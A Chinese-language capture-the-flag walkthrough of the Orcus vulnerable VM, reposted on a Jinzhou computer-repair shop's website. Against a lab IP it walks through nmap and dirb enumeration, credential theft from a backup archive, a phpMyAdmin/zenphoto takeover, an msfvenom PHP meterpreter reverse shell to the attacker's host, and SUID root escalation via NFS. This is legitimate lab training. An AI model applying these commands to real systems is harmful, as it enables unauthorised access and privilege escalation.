锦州市广厦电脑维修|上门维修电脑|上门做系统|0416-3905144热诚服务,锦州广厦维修电脑,公司IT外包服务
topFlag1 设为首页
topFlag3 收藏本站
 
maojin003 首 页 公司介绍 服务项目 服务报价 维修流程 IT外包服务 服务器维护 技术文章 常见故障
锦州市广厦电脑维修|上门维修电脑|上门做系统|0416-3905144热诚服务技术文章
挑战关于Orcus VM的解题步骤

作者: 佚名  日期:2017-05-11 14:51:18   来源: 本站整理

 前言
各位朋友,今天我们将要挑战的是由Mr. Viper为vulnerable hub设计的“ORCUS”夺旗挑战赛。本次挑战赛中包含了4部分:
获取Shell
获取root权限
获取flag
自由发挥寻找隐藏flag
下载传送门 SHA-256 : 79B1D93C60E664D70D8EB3C0CDF1AD98BF2B95036C84F87EEF065FA71C1AE51E
探索频道
192.168.0.151是我们目前已知的目标IP,收集目标信息的第一步就需要进行枚举,因此使用惯用手法使用nmap扫描其版本。 
nmap -p- -sV 192.168.0.151
从截图中你可以看出目标开放了许多端口,但我们现在只需要关注80端口就好。 

得知目标开放80端口,因此我们通过浏览器打开目标IP 192.168.0.151,但是没有收获。 

为了不浪费宝贵时间,我选择了另一款名为dirb的工具对目录进行暴力破解。在终端键入如下命令: 
dirb http://192.168.0.151
ok大方向正确,并且我们挖出了许多目录。特别是注意下面截图中我高亮标注的backups目录,接下来我们就看看该目录有没有惊喜。 

在浏览器中键入192.168.0.151/backups,其中我发现一个名为simple PHP Quiz-backup.tar.gz的tar文件。下载保存到本地,以供后面分析

解压后发现其中包含php和html文件,我的小眼睛一瞄,名为db-conn.php的文件其中会不会有数据库相关的东西呢? 

做了许多努力,最后发现dbuser,dbpasswords分别为数据库的用户名和密码。 

在此之前我们就挖到很多目录,如果你返回前面截图还可以注意到phpmyadmin目录。接着我们在浏览器中键入192.168.0.1.51/phpmyadmin,键入上一步获得数据库用户名以及密码 

正确输入用户名密码,进入phpmyadmin管理页面。其中发现名为zenphoto的数据库,进去瞧瞧吧。 

在zenphoto数据库中发现一个设置页面可用于更新数据库配置文件,在文本框区域填入我们的信息。 

此处,我们填入数据库用户名dbuser和数据库密码dbpassword,其他直接默认就好 

当点击页面下端的GO按钮便开始安装,在安装完成之后会要求你设置管理员账户及密码 

单击继续按钮,同意给出服务条款

创建管理员用户就不过多叙述,之后点击页面顶部的应用按钮就好。

使用创建的管理员账户登录zenphoto数据库,进入管理控制台之后我们可以选择上传图片,但这里我们仅上传zip文件 

键入以下命令,使用msfvenom生成恶意PHP脚本: 

msfvenom –p php/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 –f raw
从截图你可以看到生成的恶意PHP脚本,此刻我们需要复制高亮标注的部分代码。之后将其粘贴到文本文档,保存为shell.php。最后新建一个文件夹,将shell.php放入其中,然后将其进行压缩。 最重要的是记得开启metasploit中的multi handler 

回到浏览器以上传我们的zip文件,之后探寻192.168.0.151/zenphoto/albums内的信息。从下面的截图中可以看出我们成功上传shell.php 

单击shell.php,我们获得metasploit内的meterpreter会话,键入以下命令获取flag: 
Meterpreter >cd /var/www
Meterpreter >ls
Meterpreter >cat flag.txt
获得第一个flag 

经过不懈努力,我在kippo文件夹中进一步发现许多信息 
Meterpreter >pwd
Meterpreter >cd ..
Meterpreter >cat etc/kippo/data/userdb.txt
获得第二个flag 

接下来获取root权限,在文本文档中引用https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#suid-binary 中的内容。 之后将其另存为raj.c

上传编译好的raj.c文件获取root权限,如下图 
Meterpreter >upload/root/Desktop/raj.c
Meterpreter >shell
gcc -o raj raj.c

从nmap的扫描结果中我们知道目标ip的nfs端口已开放,利用这个点我们可以在Kali Linux中抓取其挂载的tmp数据 
mount -t nfs 192.168.0.151:/tmp mount
Chown root: root raj
Chmod u+s raj

./raj
Id
Cd /root
Cat flag.txt
获得第三个flag

最后就靠你自由发挥找到其他flag咯
 



热门文章
  • 机械革命S1 PRO-02 开机不显示 黑...
  • 联想ThinkPad NM-C641上电掉电点不...
  • 三星一体激光打印机SCX-4521F维修...
  • 通过串口命令查看EMMC擦写次数和判...
  • IIS 8 开启 GZIP压缩来减少网络请求...
  • 索尼kd-49x7500e背光一半暗且闪烁 ...
  • 楼宇对讲门禁读卡异常维修,读卡芯...
  • 新款海信电视机始终停留在开机界面...
  • 常见打印机清零步骤
  • 安装驱动时提示不包含数字签名的解...
  • 共享打印机需要密码的解决方法
  • 图解Windows 7系统快速共享打印机的...
  • 锦州广厦电脑上门维修

    报修电话:13840665804  QQ:174984393 (联系人:毛先生)   
    E-Mail:174984393@qq.com
    维修中心地址:锦州广厦电脑城
    ICP备案/许可证号:辽ICP备2023002984号-1
    上门服务区域: 辽宁锦州市区
    主要业务: 修电脑,电脑修理,电脑维护,上门维修电脑,黑屏蓝屏死机故障排除,无线上网设置,IT服务外包,局域网组建,ADSL共享上网,路由器设置,数据恢复,密码破解,光盘刻录制作等服务

    技术支持:微软等